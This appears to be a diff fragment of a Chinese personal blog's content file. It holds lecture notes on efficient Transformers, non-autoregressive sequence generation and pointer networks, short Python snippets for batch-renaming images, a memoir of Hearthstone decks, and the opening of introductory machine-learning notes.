    ​ 依法$O\approx V(K^TQ)$ 计算($(d+d’)N^2$ 次乘法)要比 $O\approx (VK^T)Q$ 计算($2dd’N$ 次乘法)量大得多。

    png

    ​ 把 softmax 拿回来……

    png

    png

    如果我们可以将 $\exp(q\cdot k)$ 转换成两个映射相乘 $\approx \phi(q)\cdot\phi(k)$ 的形式,那么可以对上式进行进一步简化:

    png

    png

    png

    png

    png

    png

    png

    Realization

    png

    ​ 可以这样去理解,将 φ(k) 跟 v 计算的 vector 当做一个 template,然后通过 φ(q) 去寻找哪个 template 是最重要的,并进行矩阵的运算,得到输出 b。

    那么 φ 到底如何选择呢?不同的文献有不同的做法:

    png

    ​ 在计算 self-attention 的时候一定需要 q 和 k 吗?不一定。在 Synthesizer 文献里面,对于 attention matrix 不是通过 q 和 k 得到的,而是作为网络参数学习得到。虽然不同的 input sequence 对应的 attention weight 是一样的,但是 performance 不会变差太多。其实这也引发一个思考,attention 的价值到底是什么?

    Attention-free

    png

    ​ 不使用 attention 机制处理 seq2seq 问题:

    Summary

    png

    图中横轴为训练速度,纵轴为性能得分。

    • Human knowledge
      • Local Attention,Big Bird
    • Clustering
      • Reformer
    • Learnable Pattern
      • Sinkforn
    • Representative key
      • Linformer
    • k, q first → v, k first
      • Linear Transformer, Performer
    • New framework
      • Synthesizer

    Extra Material

    -DLHLP 2020- Non-Autoregressive Sequence Generation -由助教莊永松同學講授-

    png

    条件序列生成:语音识别

    png

    其他条件序列生成:

    • Image Caption Generation 给一张图片返回文字描述
    • Machine Translation 机器翻译

    Autoegressive model (inference stage)

    png

    ​ RNN,逐个的吃 token,然后生成 token 的时候是生成下一个 token 的时候要参考当前时间步的 token,因此,无论是输入和输出都比较花费时间。

    ​ 后来有了 BERT,这个时候就可以用 BERT 替换输入模块,这个时候可以直接一次把所有的输入都吃进来,不用一个个的吃,输入的速度是解决了,但是输出还是和 RNN 一样,一个个的往外吐。

    png

    ​ 因此,就想能不能把输出也改成直接吐所有的 token 的模式,这个就是 Non-autoregressive model 的目标。

    What‘s the problem?

    png

    要实现上面提出的目标,有难度,借用之前 ML 课程中讲过的一个例子来说:
    有一个 Text-to-lmage 的任务,就是给一段文字,然后模型为文字配一个图片,传统使用有监督的方式进行训练,例如下图中给出的文字是奔跑的狗子,那么模型生成的图片要和 ground truth 要越接近越好。

    png

    ​ 由于各个神经元之间没有相互联系,输出的模型又想像这张图片,又想像那张图片。

    png

    ​ 假如我们使用 Non-Autoregressive Sequence Generation 的方式来进行 translation。输入是【Hello!】,输出可以看到有好几种合理的翻译。可以看到输出第一个 token 中【哈】【你】几率都相等,都为 50%,第二个 token 同理。那么在输出整个 sequence 的时候就有可能是 你喽/哈好。

    ​ 明显这两个都是错误的翻译,但是都是有可能被模型 sample 出来的结果。我们将这个问题称为:multi-modality problem,同一个输入,可能对应多个输出,那么 Non-Autoregressive 模型就会把各种可能的输出进行叠加,导致错误。

    png

    generate target / methodsImageText
    naive approachDeconvolution layer + L2 loss,求均值,效果差non-autoregressive decoder,multi-modality problem 本文重点要解决的问题
    autoregressivePixelRNN, VQVAE-2,效果好autoregressive decoder,成熟,缺点是一个个输出效率低
    Generative Adversarial Networks/ non-auto model效果好文字应用还不成熟,待研究

    Vanilla NAT (Non-Autoregressive Translation)

    png

    Fertility

    png

    Sequence-level knowledge distillation

    png

    png

    NPD

    png

    Autogressive model w/teacher forcing

    png

    Evolution of NAT

    png

    NAT with lterative Refinement

    png

    Mask-Predict

    png

    png

    Insertion Transformer

    png

    ​ Partially Autoregressive Model,不是纯正的 NAT,该模型会在每两个字之间做预测,是否需要插入新字

    png

    png

    Multiple target words to predict?

    png

    png

    KERMIT

    png

    这个算法对于 Insertion Transformer 而言是将 encoder 和 Decoder 都合并在一起了

    png

    png

    Levenshtein Transformer

    png

    ​ 这个模型是在插入的基础上加入了删除功能,模型如下图所示:

    png

    可以看到输入经过 encoder 之后得到初始的输出要经过三个 Decoder:

    • 第一个 Decoder 是一个删除分类器,判断是否需要删除当前单词;
    • 第二个 Decoder 是一个插入分类器,判断是否要在当前单词与单词之间插入单词,如果插入则生成一个占位符【PLH】place holder;
    • 第三个 Decoder 是 token 分类器,根据【PLH】的位置预测对应的单词。

    ​ 这个模型训练就是采用上面提到的从另外一个模型学习的方法(knowledge distillation)。具体算法称为:Levenshtein Distance Algorithm

    1
    2
    import Levenshtein
    Levenshtein.distance("ABCEFGHJJ", "ABCDEFGHI")
    1
    3
    1
    Levenshtein.editops("ABCEFGHJJ", "ABCDEFGHI")
    1
    [('insert', 3, 3), ('delete', 7, 8), ('replace', 8, 8)]

    png

    CTC

    png

    ​ CTC 也是 Non-Autoregressive 模型,只不过用在语音识别上;

    ​ 语音识别没有 multi-modality 问题,就是一段语音对应多个结果。(特殊情况当然也有,不过加入 LM 可以解决,例如有人说:城市/程式还不错!)

    Block Decoding

    png

    png

    Knowledge Distillation in NAT

    png

    ​ 最后给出来 NAT 对 Autoregressive 模型进行 Knowledge Distillation 后效果提升的研究,语料中原文为英文,译文有 de 德文,es 西班牙文,fr 法文,然后 Autoregressive 模型翻译结果非常清楚,一句话翻译出来是三种目标文字中的一种,不会混乱(下图中第一个图每一个点代表一个句子。),但是 NAT 模型就不行,最后以 Autoregressive 模型为例进行学习后,NAT 可以获得很好的效果。

    Reference

    png

    png

    Pointer Network

    ​ Pointer Network 是[seq2seq 模型](https://www.zhihu.com/search?q=seq2seq 模型&search_source=Entity&hybrid_search_source=Entity&hybrid_search_extra={“sourceType”%3A"answer"%2C"sourceId"%3A1187307191})的一个变种。他们不是把一个序列转换成另一个序列, 而是产生一系列指向输入序列元素的指针。最基础的用法是对可变长度序列或集合的元素进行排序。

    ​ 传统的 seq2seq 模型是无法解决输出序列的词汇表会随着输入序列长度的改变而改变的问题的。在某些任务中,输入严格依赖于输入,或者说输出只能从输入中选择。例如输入一段话,提取这句话中最关键的几个词语。又或是输入一串数字,输出对这些数字的排序。这时如果使用传统 seq2seq 模型,则忽略了输入只能从输出中选择这个先验信息,Pointer Networks 正是为了解决这个问题而提出的。

    Pointer Network

    png

    ​ pointer network 是一种对 attention 机制的应用。它的输出是输入的子集(相当于输出的是输入序列中部分元素的 copy)

    引例:使用 NN 求解一堆散点的凸包,输入是一堆点的坐标,输出是一个序列,每个元素表示选择了第几个输入的点。

    png

    ​ 首先考虑使用 seq2seq,但是会存在一个问题,因为我们输出的“候选集”的长度应该是 1~输入元素的个数,而输入的点的个数是不确定的,所以这个输出的候选集是变的(也就是每一个输出时间步中,softmax 输出的种类数是变化的)。(注意,这个候选集指的不是序列的长度,序列的长度是构成凸包的点的个数)在 seq2seq 模型中,只有输出序列的长度是变的,而这个 softmax 的类别数是固定的。

    png

    ​ 解决方法,用 attention 机制对每一个输入元素做 attention,取这个 attention weight 来做 softmax,然后取 argmax 得到当前时间步的输出。为什么这样做 work:因为输出每一步会对输入的所有元素去 attention,这个 attention vector 的维度正好等于输入的个数,所以每个时间步的分类个数就等于输入元素数。

    ​ 用 $(x_0,y_0)$ 表示 END,当 argmax 的结果是 $(x_0,y_0)$ 时,结束。

    Applications - Summarization

    png

    ​ 其他应用:summary 给一段文章,返回它的简介。

    ​ 之所以加入 pointer network 在这个任务上可以比 seq2seq 更好,一个原因是,文章中一般会出现一些人名地名,而这些东西可能在我们的词汇表里没有。另外,pointer network 可以直接从 input 中挑关键词出来,所以更适合做 summary。

    ​ 上面的方案是传统 seq2seq + pointer network。特点是学出来的一个 weight $p_{gen}$,表示 pointer network 和 seq2seq 分布结果的加权,求和之后得到最后的分布。

    png

    ​ 其他应用:机器翻译/chat bot,思想就是从输入中直接取一部分(这部分可能不在词汇库中)

    ]]>
    @@ -8404,7 +8404,7 @@ /posts/Python-%E4%B8%80%E4%BA%9B%E6%88%91%E5%B8%B8%E7%94%A8%E7%9A%84%E5%B0%8F%E6%93%8D%E4%BD%9C/ - 前言

    ​ 把一些我常用的小操作记录下来,省的用一次上网查一次改一次 orz

    正文

    输出一段 markdown 图片代码

    for i in range(5):
    print('![png](E1.'+ str(i + 1) + '.png)\n')
    ![png](E1.1.png)

    ![png](E1.2.png)

    ![png](E1.3.png)

    ![png](E1.4.png)

    ![png](E1.5.png)

    批量重命名

    import os

    path = r'd:\Pictures\QQplayerPic'
    label = 'E5'
    for index, file in enumerate(os.listdir(path)):
    os.rename(os.path.join(path,file),os.path.join(path,label + '.' + str(index + 1))+".png")

    批量重命名,并将重命名的文件录入剪贴板

    import os
    import pyperclip

    path = r'd:\Pictures\QQplayerPic'
    label = 'E5'
    copy_text = ""
    for index, file in enumerate(os.listdir(path)):
    copy_text += '![png]('+ label + '.' + str(index + 1) + '.png)\n\n'
    os.rename(os.path.join(path,file),os.path.join(path,label + '.' + str(index + 1))+".png")
    pyperclip.copy(copy_text)
    print(copy_text)
    ![png](E5.1.png)

    ![png](E5.2.png)

    ![png](E5.3.png)

    ![png](E5.4.png)

    ![png](E5.5.png)

    ]]>
    + 前言

    ​ 把一些我常用的小操作记录下来,省的用一次上网查一次改一次 orz

    正文

    输出一段 markdown 图片代码

    1
    2
    for i in range(5):
    print('![png](E1.'+ str(i + 1) + '.png)\n')
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ![png](E1.1.png)

    ![png](E1.2.png)

    ![png](E1.3.png)

    ![png](E1.4.png)

    ![png](E1.5.png)

    批量重命名

    1
    2
    3
    4
    5
    6
    import os

    path = r'd:\Pictures\QQplayerPic'
    label = 'E5'
    for index, file in enumerate(os.listdir(path)):
    os.rename(os.path.join(path,file),os.path.join(path,label + '.' + str(index + 1))+".png")

    批量重命名,并将重命名的文件录入剪贴板

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import os
    import pyperclip

    path = r'd:\Pictures\QQplayerPic'
    label = 'E5'
    copy_text = ""
    for index, file in enumerate(os.listdir(path)):
    copy_text += '![png]('+ label + '.' + str(index + 1) + '.png)\n\n'
    os.rename(os.path.join(path,file),os.path.join(path,label + '.' + str(index + 1))+".png")
    pyperclip.copy(copy_text)
    print(copy_text)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ![png](E5.1.png)

    ![png](E5.2.png)

    ![png](E5.3.png)

    ![png](E5.4.png)

    ![png](E5.5.png)

    ]]>
    @@ -8479,7 +8479,7 @@ /posts/Game-%E7%BB%99%E8%A6%81%E5%85%B3%E9%97%A8%E7%9A%84%E7%82%89%E7%9F%B3%E4%B8%8A%E4%B8%AA%E9%A6%99/ - 前言
            

    ​ 听说到了暴雪要退出中国的消息,那就给我本科经常玩的炉石上个香吧!记录一下玩过的种种上分/划水卡组,这篇文章一共收录了 40 套!

    ​ 由于我已经很久没有接触它了,一些卡组是凭借记忆重组的,可能会有点误差。出于我对游戏优秀的理解和缺卡,一些构筑并不是当时最主流的。

    jpg

    正文

    1. 古神的低语

    jpg

    ​ 第一次入坑是 16 年,在高一的美术课上无聊看别人打的很 high,就入坑了😅。由于那时候未成年还上网找了个身份证逃避防沉迷验证。当时最新的版本是《古神的低语》,由于没什么卡就只能玩送的克苏恩了,由于核心组件基本都中立卡任何职业都组了一套克苏恩,出于术士优秀的英雄技能,玩的时间最多。

    ​ 第一次入坑大概玩了一个月,某天由于一阵乱输气得我卸载了游戏😅。

    2. 砰砰计划

    jpg

    ​ 高考完后再次入坑,由于已经成年了就换回自己的身份证做大号,之前玩了一段时间的号就变成小号了😅。大学军训的某一天傍晚开包开了一张金色的“神奇的威兹班”,这张卡可以让我体验各种职业的全金卡组!真是太幸运了!结果当晚军训演唱的时候丢了个充电宝😅。就当是这张卡换了个充电宝吧。

    ​ 毕竟这是一款网游,而我一向不喜欢往网游里氪金,而网游里没钱又不能获得好的游戏体验。也正是这张卡和盛成日带我玩才没有弃坑😅。

    jpg

    ​ 国庆假期中开了张金色传说,再加上之前拆解了一些卡收集了一些粉尘合了一张嗜月者巴库,我的第一套上分卡组——奇数骑诞生了!虽然这在当时是 t1 卡组,可一直摇报告还是有点无聊😅。

    jpg

    ​ 后来又攒了尘合了火车王和邪脊吞噬者,第二套上分卡组——奇数贼诞生了!

    jpg

    ​ 既然有了巴库和火车王就顺带把奇数猎也做了出来😅。

    3. 拉斯塔哈的大乱斗

    jpg

    ​ 后来临近期末考试,盛成日说他要好好学习就直接把号借给我玩。由于玩奇数三兄弟的快攻实在是太无聊,在盛成日的号上玩起了法术猎,不得不说是个很有节奏感的卡组。

    jpg

    ​ 又花了盛成日的 2400 粉尘合了巫妖王和山岭巨人,这套卡组后手可以 3 费下山岭巨人,体验巨人骑脸的快感,后来盛成日还拿这套卡组打比赛了。

    jpg

    ​ 在平衡补丁后等级提升冷血猎人印记法术翡翠滋养激活一阵削弱。

    ​《拉斯塔哈的大乱斗》是一个很弱的版本,几乎没有什么新卡能影响环境,平衡补丁又削弱了很多人的“信仰卡组”导致很多人弃坑,炉石在当时算是一个低谷,而我感觉对刚入坑/回坑的人还是蛮友好,由于卡组的构筑变化不大使得新手有较长的时间攒出一套主流的卡组。

    ​ 这时候野兽猎成为了新的 t1 卡组!主流的构筑中是携带追踪术而不是宝石鹦鹉,而我那时由于追踪术要弃牌就非常不喜欢,选择了宝石鹦鹉,增加了 1 费野兽数量更好地配合雷鸣刺喉龙。主流的构筑也没有山猫之神,而我当时想玩玩为数不多的橙卡就带上了。

    jpg

    ​ 玩了一个寒假攒的尘合了张狼王。由于当时的主流主播都是玩狂野模式(可能是当时标准模式实在是太无聊了吧),我也就跟风组了套便宜强力的偶数萨并成功打到 5 级,此后很长一段时间都在狂野混了。

    4. 暗影崛起

    jpg

    ​ 荣誉室后获得了更多的尘!当时非常喜欢奇偶卡组就合了套偶数术,偶数萨和偶数术混合着用保证每个月都打到 5 级混个低保。

    5. 奥丹姆奇兵

    jpg

    ​《奥丹姆奇兵》送了张萨满任务,觉得林彻和沙德沃克合了不亏就组了一套完整的任务萨。这套卡组可操作性非常不错!

    ​ 后来拿这套卡组去学校比赛打了个酱油回来。

    jpg

    ​《奥丹姆奇兵》给了很多奥秘法的组件以压制在狂野肆虐的奇迹法,由于我缺卡就用盛成日的号玩了一段时间,结果一阵乱杀打进 4 级。

    jpg

    ​ 看别人玩德鲁伊一直觉得很强,再加上之前一直没怎么玩过就把暑假攒的所有尘合了一套青玉德,结果发现它好像谁都打不过。

    jpg

    ​ 有了艾雅黑掌就合了套青玉萨,这是套娱乐卡组所以玩的不多,此时佐拉和洛欧塞布也合了出来,决定慢慢攒出宇宙的组件。

    6. 巨龙降临

    jpg

    ​《巨龙降临》版本给了海盗战很多组件,于是合了套奇数战抓抓快攻。但是这卡组打慢速卡组游戏体验真是太差了!看到牧师术士和德鲁伊都想直接跑路。

    jpg

    ​ 合了张帕奇斯组了套奇数贼用于上分。

    7. 迦拉克隆的觉醒

    jpg

    ​ 然后就是迎来史上最长的寒假!这段时间里玩了非常久的炉石,想想还真是颓废啊。

    ​ 使用奥秘法偶数术奇数贼海盗战尝试冲传说发现久攻不下,心态一度炸裂。最后返璞归真用偶数萨冲上了游戏中第一次传说。

    jpg

    ​ 又是要退环境的时候,靠荣誉室又赚了一波尘。在退环境之前短暂地把一些削弱的卡回调了,其中就有我最喜欢的橙卡“科学狂人”砰砰博士!

    ​ 发现再合几张宇宙组件就能组一套很豪华的宇宙战,合!

    ​ 这个卡组遇到内战还真是比膀胱,打一局能快半小时。

    jpg

    ​ 宇宙猎算得上是我最喜欢的卡组之一。节奏感优秀,冷门、豪华而且强力。

    ​ 好长一段时间,用这套卡组优开偶数萨奇数骑奥秘法轻松上了传说。

    jpg

    ​ 没事玩盛成日的号随便组了套蓝龙术,思路是用 439 拖回合时长再用一堆直伤法术偷鸡。结果盛成日还特别喜欢玩,用这套卡组修修补补上了好几次传说。

    jpg

    ​ 由于盛成日特别喜欢玩慢速 OTK 卡组,特意合了套爆牌贼破坏他的游戏体验。

    jpg

    ​ 合了张大帝本来想玩宇宙术,结果组件还差一点就顺便组了套沙雕卡组——野猪术!思路是送掉邪魔仆从,最后使用送葬者安德提卡、力量的代价和残酷集结给小野猪加一堆攻击斩杀对手。

    8. 外域的灰烬

    jpg

    ​ 炉石迎来新的职业恶魔猎手,奇数瞎在狂野相当炸裂,本身奇数卡组框架已经集齐就整了一套。但是那时候对极限快攻比较腻就没怎么玩。

    jpg

    ​ 由于奇数瞎在狂野非常猖狂,但我就算打不过也不想加入,宇宙猎对奇数瞎也仅仅是小优,开始寻找其他卡组以抗衡奇数瞎。尝试了 JK 战,在和奇数瞎互相锤脸后发现锤不过对面。

    jpg

    ​ 于是我就想着使用 JK 战在发现锤不过奇数瞎的时候能不能使用雷诺耍赖皮?原创了一套宇宙 JK 战发现效果非常好,打着打着就又传说了。

    jpg

    ​ 这个版本的弃牌术也比较猖狂,本着师夷长技以制夷的想法,拿着小号不多的尘组了套弃牌术,结果一阵连胜。

    9. 通灵学园

    jpg

    ​ 由于大号已经 11 星,上传说并不是一件难事。但是由于这个版本黑眼术十分猖狂导致我游戏体验极差。之前的卡组差不多跟不上节奏了。

    ​ 本着师夷长技以制夷的想法,拿着小号组了套黑眼术,导致我游戏体验极好。

    10. 疯狂的暗月马戏团

    jpg

    ​ 这个版本给狂野经典卡组补充了很多组件,而我又很幸运地开到了它们。

    jpg

    ​ 大哥牧的成本越来越低,也就合了一套,发现游戏体验也就那样。

    jpg

    ​ 这也是我原创的一套我很喜欢的卡组!集快攻控制 OTK 的思想于一身。前期当作奥秘法用,发现打不过就用宇宙组件耍赖皮,后期久攻不下就使用大法师-幻觉药水回手,第二回合大法师-克苏恩面具一波带走。

    11. 暗月竞速赛

    jpg

    ​ 由于疫情期间玩得特别多,攒了一堆尘,刚好能组一套超豪华的宇宙法,其实实力并不强力。

    jpg

    ​ 枯木逢春宇宙术!由于我刚好开到了提克特斯就又能继续 happy 了。

    jpg

    ​ 宇宙牧由于几乎没有劣势对局,成为了当时最主流的卡组之一。当时应该是我炉石水平最高的一段时间,大概打到了国服 200 名左右,甚至都能遇到炉石届许多很有名的大神。由于国服顶端卡组分布特殊,甚至都要靠自己的理解特化构筑以针对特定的卡组。

    jpg

    ​ 模仿狗贼的构筑合了一套宇宙防战,带了一堆针对卡针对环境中肆虐的宇宙牧黑眼术弑君贼,终结手段是血骨傀儡-恩佐斯。

    jpg

    ​ 开包开着开着给了我张弑君,于是也顺便组了套弑君贼。

    jpg

    ​ 根据自己对卡组的理解对异灵术老师的快乐术进行了魔改,也就打打宇宙术了,上分还是算了。

    jpg

    ​ 从某个大神抄来的库卡隆战,卖点是艇长-巴罗夫领主/沸血蛮兵抗衡黑眼术,找机会复制库卡隆精英卫士偷鸡,如果组件被破坏还可以尝试复制血骨傀儡。

    jpg

    ​ 从库卡隆战的防守思路演变而来的 ETC 战,这套更偏向于防守一些。冷门又强力的卡组我还是蛮喜欢的。

    12. 贫瘠之地的锤炼

    jpg

    ​ 凭着之前攒的卡组的一套残片术。由于不想合连环灾难索性抛弃了 4 费曲线使用了卡扎库斯,但是卡扎库斯的效果好像并不是很好。

    jpg

    ​用剩余的尘合了一套魔块术以针对狂野环境的厕所骑,效果拔群。在用这套卡组首日便上了传说后不几天就觉得该收心去考研就弃坑了,现在想想确实是个正确的决定,确实是个精彩的游戏,但是我本科期间在这款游戏上花了太多的时间。

    ]]>
    + 前言
            

    ​ 听说到了暴雪要退出中国的消息,那就给我本科经常玩的炉石上个香吧!记录一下玩过的种种上分/划水卡组,这篇文章一共收录了 40 套!

    ​ 由于我已经很久没有接触它了,一些卡组是凭借记忆重组的,可能会有点误差。出于我对游戏优秀的理解和缺卡,一些构筑并不是当时最主流的。

    jpg

    正文

    1. 古神的低语

    jpg

    ​ 第一次入坑是 16 年,在高一的美术课上无聊看别人打的很 high,就入坑了😅。由于那时候未成年还上网找了个身份证逃避防沉迷验证。当时最新的版本是《古神的低语》,由于没什么卡就只能玩送的克苏恩了,由于核心组件基本都中立卡任何职业都组了一套克苏恩,出于术士优秀的英雄技能,玩的时间最多。

    ​ 第一次入坑大概玩了一个月,某天由于一阵乱输气得我卸载了游戏😅。

    2. 砰砰计划

    jpg

    ​ 高考完后再次入坑,由于已经成年了就换回自己的身份证做大号,之前玩了一段时间的号就变成小号了😅。大学军训的某一天傍晚开包开了一张金色的“神奇的威兹班”,这张卡可以让我体验各种职业的全金卡组!真是太幸运了!结果当晚军训演唱的时候丢了个充电宝😅。就当是这张卡换了个充电宝吧。

    ​ 毕竟这是一款网游,而我一向不喜欢往网游里氪金,而网游里没钱又不能获得好的游戏体验。也正是这张卡和盛成日带我玩才没有弃坑😅。

    jpg

    ​ 国庆假期中开了张金色传说,再加上之前拆解了一些卡收集了一些粉尘合了一张嗜月者巴库,我的第一套上分卡组——奇数骑诞生了!虽然这在当时是 t1 卡组,可一直摇报告还是有点无聊😅。

    jpg

    ​ 后来又攒了尘合了火车王和邪脊吞噬者,第二套上分卡组——奇数贼诞生了!

    jpg

    ​ 既然有了巴库和火车王就顺带把奇数猎也做了出来😅。

    3. 拉斯塔哈的大乱斗

    jpg

    ​ 后来临近期末考试,盛成日说他要好好学习就直接把号借给我玩。由于玩奇数三兄弟的快攻实在是太无聊,在盛成日的号上玩起了法术猎,不得不说是个很有节奏感的卡组。

    jpg

    ​ 又花了盛成日的 2400 粉尘合了巫妖王和山岭巨人,这套卡组后手可以 3 费下山岭巨人,体验巨人骑脸的快感,后来盛成日还拿这套卡组打比赛了。

    jpg

    ​ 在平衡补丁后等级提升冷血猎人印记法术翡翠滋养激活一阵削弱。

    ​《拉斯塔哈的大乱斗》是一个很弱的版本,几乎没有什么新卡能影响环境,平衡补丁又削弱了很多人的“信仰卡组”导致很多人弃坑,炉石在当时算是一个低谷,而我感觉对刚入坑/回坑的人还是蛮友好,由于卡组的构筑变化不大使得新手有较长的时间攒出一套主流的卡组。

    ​ 这时候野兽猎成为了新的 t1 卡组!主流的构筑中是携带追踪术而不是宝石鹦鹉,而我那时由于追踪术要弃牌就非常不喜欢,选择了宝石鹦鹉,增加了 1 费野兽数量更好地配合雷鸣刺喉龙。主流的构筑也没有山猫之神,而我当时想玩玩为数不多的橙卡就带上了。

    jpg

    ​ 玩了一个寒假攒的尘合了张狼王。由于当时的主流主播都是玩狂野模式(可能是当时标准模式实在是太无聊了吧),我也就跟风组了套便宜强力的偶数萨并成功打到 5 级,此后很长一段时间都在狂野混了。

    4. 暗影崛起

    jpg

    ​ 荣誉室后获得了更多的尘!当时非常喜欢奇偶卡组就合了套偶数术,偶数萨和偶数术混合着用保证每个月都打到 5 级混个低保。

    5. 奥丹姆奇兵

    jpg

    ​《奥丹姆奇兵》送了张萨满任务,觉得林彻和沙德沃克合了不亏就组了一套完整的任务萨。这套卡组可操作性非常不错!

    ​ 后来拿这套卡组去学校比赛打了个酱油回来。

    jpg

    ​《奥丹姆奇兵》给了很多奥秘法的组件以压制在狂野肆虐的奇迹法,由于我缺卡就用盛成日的号玩了一段时间,结果一阵乱杀打进 4 级。

    jpg

    ​ 看别人玩德鲁伊一直觉得很强,再加上之前一直没怎么玩过就把暑假攒的所有尘合了一套青玉德,结果发现它好像谁都打不过。

    jpg

    ​ 有了艾雅黑掌就合了套青玉萨,这是套娱乐卡组所以玩的不多,此时佐拉和洛欧塞布也合了出来,决定慢慢攒出宇宙的组件。

    6. 巨龙降临

    jpg

    ​《巨龙降临》版本给了海盗战很多组件,于是合了套奇数战抓抓快攻。但是这卡组打慢速卡组游戏体验真是太差了!看到牧师术士和德鲁伊都想直接跑路。

    jpg

    ​ 合了张帕奇斯组了套奇数贼用于上分。

    7. 迦拉克隆的觉醒

    jpg

    ​ 然后就是迎来史上最长的寒假!这段时间里玩了非常久的炉石,想想还真是颓废啊。

    ​ 使用奥秘法偶数术奇数贼海盗战尝试冲传说发现久攻不下,心态一度炸裂。最后返璞归真用偶数萨冲上了游戏中第一次传说。

    jpg

    ​ 又是要退环境的时候,靠荣誉室又赚了一波尘。在退环境之前短暂地把一些削弱的卡回调了,其中就有我最喜欢的橙卡“科学狂人”砰砰博士!

    ​ 发现再合几张宇宙组件就能组一套很豪华的宇宙战,合!

    ​ 这个卡组遇到内战还真是比膀胱,打一局能快半小时。

    jpg

    ​ 宇宙猎算得上是我最喜欢的卡组之一。节奏感优秀,冷门、豪华而且强力。

    ​ 好长一段时间,用这套卡组优开偶数萨奇数骑奥秘法轻松上了传说。

    jpg

    ​ 没事玩盛成日的号随便组了套蓝龙术,思路是用 439 拖回合时长再用一堆直伤法术偷鸡。结果盛成日还特别喜欢玩,用这套卡组修修补补上了好几次传说。

    jpg

    ​ 由于盛成日特别喜欢玩慢速 OTK 卡组,特意合了套爆牌贼破坏他的游戏体验。

    jpg

    ​ 合了张大帝本来想玩宇宙术,结果组件还差一点就顺便组了套沙雕卡组——野猪术!思路是送掉邪魔仆从,最后使用送葬者安德提卡、力量的代价和残酷集结给小野猪加一堆攻击斩杀对手。

    8. 外域的灰烬

    jpg

    ​ 炉石迎来新的职业恶魔猎手,奇数瞎在狂野相当炸裂,本身奇数卡组框架已经集齐就整了一套。但是那时候对极限快攻比较腻就没怎么玩。

    jpg

    ​ 由于奇数瞎在狂野非常猖狂,但我就算打不过也不想加入,宇宙猎对奇数瞎也仅仅是小优,开始寻找其他卡组以抗衡奇数瞎。尝试了 JK 战,在和奇数瞎互相锤脸后发现锤不过对面。

    jpg

    ​ 于是我就想着使用 JK 战在发现锤不过奇数瞎的时候能不能使用雷诺耍赖皮?原创了一套宇宙 JK 战发现效果非常好,打着打着就又传说了。

    jpg

    ​ 这个版本的弃牌术也比较猖狂,本着师夷长技以制夷的想法,拿着小号不多的尘组了套弃牌术,结果一阵连胜。

    9. 通灵学园

    jpg

    ​ 由于大号已经 11 星,上传说并不是一件难事。但是由于这个版本黑眼术十分猖狂导致我游戏体验极差。之前的卡组差不多跟不上节奏了。

    ​ 本着师夷长技以制夷的想法,拿着小号组了套黑眼术,导致我游戏体验极好。

    10. 疯狂的暗月马戏团

    jpg

    ​ 这个版本给狂野经典卡组补充了很多组件,而我又很幸运地开到了它们。

    jpg

    ​ 大哥牧的成本越来越低,也就合了一套,发现游戏体验也就那样。

    jpg

    ​ 这也是我原创的一套我很喜欢的卡组!集快攻控制 OTK 的思想于一身。前期当作奥秘法用,发现打不过就用宇宙组件耍赖皮,后期久攻不下就使用大法师-幻觉药水回手,第二回合大法师-克苏恩面具一波带走。

    11. 暗月竞速赛

    jpg

    ​ 由于疫情期间玩得特别多,攒了一堆尘,刚好能组一套超豪华的宇宙法,其实实力并不强力。

    jpg

    ​ 枯木逢春宇宙术!由于我刚好开到了提克特斯就又能继续 happy 了。

    jpg

    ​ 宇宙牧由于几乎没有劣势对局,成为了当时最主流的卡组之一。当时应该是我炉石水平最高的一段时间,大概打到了国服 200 名左右,甚至都能遇到炉石届许多很有名的大神。由于国服顶端卡组分布特殊,甚至都要靠自己的理解特化构筑以针对特定的卡组。

    jpg

    ​ 模仿狗贼的构筑合了一套宇宙防战,带了一堆针对卡针对环境中肆虐的宇宙牧黑眼术弑君贼,终结手段是血骨傀儡-恩佐斯。

    jpg

    ​ 开包开着开着给了我张弑君,于是也顺便组了套弑君贼。

    jpg

    ​ 根据自己对卡组的理解对异灵术老师的快乐术进行了魔改,也就打打宇宙术了,上分还是算了。

    jpg

    ​ 从某个大神抄来的库卡隆战,卖点是艇长-巴罗夫领主/沸血蛮兵抗衡黑眼术,找机会复制库卡隆精英卫士偷鸡,如果组件被破坏还可以尝试复制血骨傀儡。

    jpg

    ​ 从库卡隆战的防守思路演变而来的 ETC 战,这套更偏向于防守一些。冷门又强力的卡组我还是蛮喜欢的。

    12. 贫瘠之地的锤炼

    jpg

    ​ 凭着之前攒的卡组的一套残片术。由于不想合连环灾难索性抛弃了 4 费曲线使用了卡扎库斯,但是卡扎库斯的效果好像并不是很好。

    jpg

    ​用剩余的尘合了一套魔块术以针对狂野环境的厕所骑,效果拔群。在用这套卡组首日便上了传说后不几天就觉得该收心去考研就弃坑了,现在想想确实是个正确的决定,确实是个精彩的游戏,但是我本科期间在这款游戏上花了太多的时间。

    ]]>
    @@ -8529,7 +8529,7 @@ /posts/ML-%E6%9D%8E%E5%AE%8F%E6%AF%85-Lecture%201-Introduction%20of%20Deep%20Learning/ - Preparation

    ##【機器學習 2021】預測本頻道觀看人數 -上- - 機器學習基本概念簡介

    什么是机器学习

    png

    Machine Learning ≈ Look for Function 让机器具备找函数的能力

    • Speech Recognition 语音辨识
    • Image Recognition 图像识别
    • Playing Go 下围棋

    机器学习的各个领域

    png

    • Regression 回归,如接受今日 PM 2.5,气温和臭氧含量作为参数,以明日 PM2.5 作为输出
      • The function outputs a scalar. 该函数输出一个标量。
    • Classification 分类,如判断收到的邮件是否为垃圾邮件。
      • Given options (classes), the function outputsthe correct one. 给出选项(类),该函数输出正确的选项。

    png

    ​ 如下围棋就是一个分类问题,将围棋的每个坐标当作一个类来看。

    png

    回归分类只是机器学习中的一小部分,还有结构化学习 Structured Learning,输入和输出都是具有结构化的对象(数列、列表、树、边界框等)。

    举例:预测本频道观看人数

    png

    ​ 找到一个函数用于描述某天本频道观看人数。

    1.Function with Unknown Parameters

    png

    ​ 我们假设某天本频道观看人数 $y$ 与其前一天本频道观看人数 $x_1$ 有关,且满足关系式 $y = b + wx_1$。

    ​ 参数 $w$ 和 $b$ 都是未知的,要从数据中学习得出。

    2.Define Loss from Training Data

    png

    损失函数 $L(b, w)$ 是一个含有参数 $w$ 和 $b$ 的函数,用于衡量参数 $w$ 和 $b$ 的取值有多好。

    $$Loss: L = \frac{1}{N}\sum_ne_n$$

    $y$ 表示预测值,$\hat y$ 表示实际值,$e$ 表示误差

    • 如果 $e=|y-\hat y|$,则 $L$ 为平均绝对值误差(MAE)
